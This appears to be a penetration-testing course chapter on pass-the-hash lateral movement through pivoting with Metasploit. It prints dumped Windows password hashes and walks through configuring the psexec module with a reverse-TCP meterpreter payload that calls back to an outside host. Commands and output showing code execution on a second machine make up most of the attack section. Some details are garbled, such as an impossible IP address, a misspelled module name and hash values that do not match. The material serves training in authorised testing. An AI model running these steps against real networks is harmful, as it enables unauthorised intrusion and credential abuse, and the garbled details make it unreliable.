Exploitation through Pivoting

6.5. Exploitation through Pivoting

Thanks to the power of Pivoting, we can move around the internal target network easily and quickly. We will leverage this potential to attack and exploit new hosts. We should at this point use our exploitation skills.

This let us introduce a very powerful attacking technique that proves to be extremely useful during Post Exploitation (and other areas): Pass the hash.

A weakness in the Windows authentication protocols allows users to log on the OS by just providing the hashes version of the password (NT or LM) instead of the actual clear text password.

This opens an attacking vector typical of the Windows environments.

When the same password is used on multiple hosts within a network and you get the hash of the password from one of these hosts, you automatically have access to all other machines.

Even though you do not know the actual password (for example, it takes too long to crack).

This happens because there is no salt in Windows passwords.

Tools and Metasploit modules have been produced to exploit the weakness and get the most out of it: execution of a shellcode.

Since we have already dumped hashes from the first attacked machine, if the same user, with the same password exists on other machines, we should be able to get access to all of them.

The beauty of this attack, is that we do not even need to crack the password hashes and get the plain text. We only need the hashes.

Let us dump our victim hashes with hashdump command. meterpreter > hashdump Administrator:500:1404e35b51404eeeaad3b4aad3b435b5:d2688ac52a4d9e6bffa7969b74132a4f::: els:1000:eaad3b435b51404eeaad3b435b51404e:fa796d9e6bfd2688ac52a49b74132a4f::: eLS_Admin:1002:aad3b435b51404eea40ad3b435b514ee:6d2688ac52a49bd9e6bffa7974132a4f::: els_user:1001:eaad3b435b51aad3b435b51404e404ee:bffa96d2688ac52a7d9e649b74132a4f::: Guest:501:d3b435baad3bb51404eeaa54351404ee:6bffa78ac52ad9e96d26849b74132a4f:::

As we can see, there are different users that we can test for our purpose

The Metasploit module that we can use to run the pass-the-hash attack is called psexec: ``` msf > use exploit/windows/smb/psexec msf exploit(psexec) > info

      Name: Microsoft Windows Authenticated User Code Execution
    Module: exploit/windows/smb/pmexec

Description:
  This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean upu after itself. The service created by this tool uses a randomly chosen name and description.
```

Let's say we want to try the attack using the user credentials for the user account els. We configure the module with the following information: - A payload to use - The remote host on which run the attack (RHOST) - The user account to use (SMBUser) - The password hash for the account (SMBPass)

This are the commands that we are going to run in order to configure our module: msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(psexec) > set LHOST 66.176.44.106 LHOST => 66.176.44.106 msf exploit(psexec) > set RHOST 10.10.10.5 RHOST => 10.10.10.5 msf exploit(psexec) > set SMBUser els SMBUser => els msf exploit(psexec) > set SMBPASS aad3b435b51404eeaad3b435b51404ee:d9e6bffa796d2688ac52a49b74132a4f SMBPASS => aad3b435b51404eeaad3b435b51404ee:d9e6bffa796d2688ac52a49b74132a4f

Once again, we will target the host `10.10.10.5`.

Once the module ends, if the exploit works we will obtain a new meterpreter session on the new victim (10.10.10.5): ``` msf exploit(psexec) > exploit

[*] Started reverse TCP handler on 1912.168.102.147:4444
[*] Connecting to the server...
[*] Authenticating to 10.10.10.5:445 as user 'els'...
[*] Selecting native target
[*] Uploading payload...
[*] Created \mcRcNNkT.exe...
[*] Sending stage (957487 bytes) to 66.176.44.1
[+] 10.10.10.5:445 - Service started successfully...
[*] Deleted \mcRcNNkT.exe...
```

We have successfully exploited a new host by means of pass-the-hash technique and we now have two compromised machines on the target network.

Not that we have full control of the new host, we can start over the Post Exploitation process from this host in order to get more information about the organization, its services, hosts, networks, and so on.

Notice that the same steps can be used with almost all other Metasploit modules. For example, if we find a vulnerable service on one of the internal machines, we just need to select and run the correct Metasploit module.

Moreover, remember that you can also run exploits through proxychains. This mens that if Metasploit does not offer any module for that specific vulnerability, but you have a working exploit, you can pivot it to the internal network via proxychains and socks4a.

(see vid-329)

Conclusion

At this point, you should have the methodology and the skill-set necessary to perform a thorough Penetration test on a remote network.

Make sure to refer to our proposed Post Exploitation process during your engagements and make sure to optimize it and customize it according to the scope and environment of your test.

Now that we have covered all phases of an engagement, the below link is a guide indicating how to properly construct your report.

Reporting guide

(see vid-322) (see vid-323)